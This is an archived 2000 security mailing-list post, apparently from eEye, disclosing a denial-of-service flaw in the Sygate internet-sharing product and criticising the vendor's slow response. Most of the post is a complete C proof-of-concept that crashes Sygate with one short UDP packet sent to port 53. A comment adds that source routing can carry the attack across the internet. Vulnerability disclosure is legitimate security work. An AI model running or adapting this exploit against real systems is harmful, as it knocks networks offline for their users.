This is just a nuisance to some, as I do not know of many corporate networks
that rely on a product such as Sygate. In fact I hope no corporate network
relies on Sybergen software considering the way they treat security issues.
They were contacted about this hole a while ago. They pretty much did the
usual "Well put a fix for it in the next major version update of our
software" but who cares if people are left vulnerable for months.
As you can see from http://www.sybergen.com/support/fix.htm this issue is
most likely still valid and people running Sygate are vulnerable to an
annoying exploit that can keep a companies network from "surfing the net"
yadda yadda yadda. If your a user of Sygate then send an eMail to
support_at_sygate.com and I am sure if enough people eMail they will write a
fix.
//Sygate Crash by: marc_at_eeye.com (April-00)
//http://www.eEye.com
//Will crash Sygate (http://www.sygate.com/) when ran from the internal LAN.
//Play with source routing to get it to work across the internet.
//Just hit the Internal IP of the Sygate machine.
#include <stdio.h>
#include <arpa/inet.h>
int main (int argc, char **argv)
{
int SockFD, addrlen, bsent;
struct sockaddr_in UDPSock;
char bomb[]= "changeiscoming";
printf("Sygate Crash by: marc_at_eeye.com\n");
printf("http://www.eEye.com\n\n");
if(argc<2){
printf("Usage: %s [server]\n",argv[0]);
exit(1);
}
SockFD=socket(AF_INET, SOCK_DGRAM, 0);
UDPSock.sin_family=AF_INET;
UDPSock.sin_addr.s_addr=inet_addr(argv[1]);
UDPSock.sin_port=htons(53);
bsent=sendto(SockFD,&bomb,13,0,(struct sockaddr *) &UDPSock,
sizeof(struct sockaddr_in));
printf("Sent Crash.\nBytes Sent: %i\n",bsent);
}
Signed,
Marc Maiffret
Chief Hacking Officer
eCompany / eEye
T.949.675.8160
F.949.675.8191
http://eEye.com
Received on Jul 01 2000
Intro
